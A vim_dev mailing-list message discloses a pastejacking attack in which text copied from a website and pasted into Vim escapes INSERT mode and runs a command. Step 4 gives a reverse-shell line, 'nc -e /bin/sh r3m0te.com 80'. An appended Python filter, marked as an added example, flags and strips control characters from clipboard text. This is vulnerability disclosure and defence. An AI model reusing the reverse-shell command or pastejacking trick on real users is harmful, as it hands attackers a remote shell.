On 01/19/2017 08:05 AM, Marc Weber wrote:
> 
> Insert mode is not for pasting, see pastetoggle / paste options.
> :r!cat then ctrl-d is a fast workaround for Linux systems.
> 
> If you can reproduce your issue with paste mode you clearly have found
> a bug (IMHO). In the other case I'm unsure because pasting is no
> different from typing thus you probably can paste :!<run command>
> equally well in some way or <c-r>=system('...') like command (no idea,
> never tried it)
> 
> Other people might have more knowledge.
> 
> Marc Weber
> 

The trigger in this is a commonly used "ctrl+shift+v". I have asked
around a few vim users about how they copy a text from a website into a
file opened by vim. It looks like everyone is doing it that way.

Maybe I was not clear enough in the first mail, but the exploit scenario
can be the following:

1. User opens a website, for example "Vim Tutorial".
2. User copies text from the webpage, but it's pastejacked (e.g. the user
copies the exploit payload and not what he sees on the site). Reference:
https://github.com/dxa4481/Pastejacking
3. User inserts this text by "ctrl+shift+v" into a file opened by vim.
(note: he does not even need to be in INSERT mode of course.)
4. Then by this, INSERT mode is escaped if needed and the following is
executed: nc -e /bin/sh r3m0te.com 80


In the case of a file containing the crafted message, it does not escape, but
in the case of manual copy-paste there is always a way to make it work.

If you think it's just a bug, then I can share the PoC here, but for
sure it can be really dangerous.

cheers,
sıx

-- 
-- 
You received this message from the "vim_dev" maillist.
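
A defensive check for the scenario described in the message above, as an added example that is not part of the original mail or of Vim: it inspects clipboard text for control and invisible characters before the text reaches a terminal editor. The function names and both sample strings are constructed for illustration.

```python
import sys
import unicodedata

# Whitespace controls that ordinary copied text may contain.
ALLOWED = {"\t", "\n", "\r"}


def find_control_chars(text):
    """Return (offset, 'U+XXXX', kind) for each character that a terminal
    delivers as a key press (Cc) or that is invisible on screen (Cf)."""
    hits = []
    for offset, ch in enumerate(text):
        if ch in ALLOWED:
            continue
        category = unicodedata.category(ch)
        if category in ("Cc", "Cf"):
            kind = "control" if category == "Cc" else "invisible"
            hits.append((offset, f"U+{ord(ch):04X}", kind))
    return hits


def sanitize(text):
    """Normalise line endings to LF, then drop every flagged character."""
    text = text.replace("\r\n", "\n").replace("\r", "\n")
    flagged = {offset for offset, _, _ in find_control_chars(text)}
    return "".join(ch for i, ch in enumerate(text) if i not in flagged)


# Constructed samples: what the user believes was copied, and the same text
# carrying an ESC byte (the key that leaves INSERT mode) and a zero-width space.
CLEAN_SAMPLE = "set number\n\tset expandtab\n"
TAMPERED_SAMPLE = "set number\x1b\n\tset\u200b expandtab\r\n"

if __name__ == "__main__":
    # Filter mode: clipboard text on stdin, findings on stderr,
    # sanitized text on stdout, exit status 1 if anything was flagged.
    data = sys.stdin.read()
    findings = find_control_chars(data)
    for offset, codepoint, kind in findings:
        print(f"offset {offset}: {codepoint} ({kind})", file=sys.stderr)
    sys.stdout.write(sanitize(data))
    sys.exit(1 if findings else 0)
```

Stripping these characters only helps when the text is inserted literally; text pasted while the editor is not in INSERT mode is interpreted as commands regardless of its content.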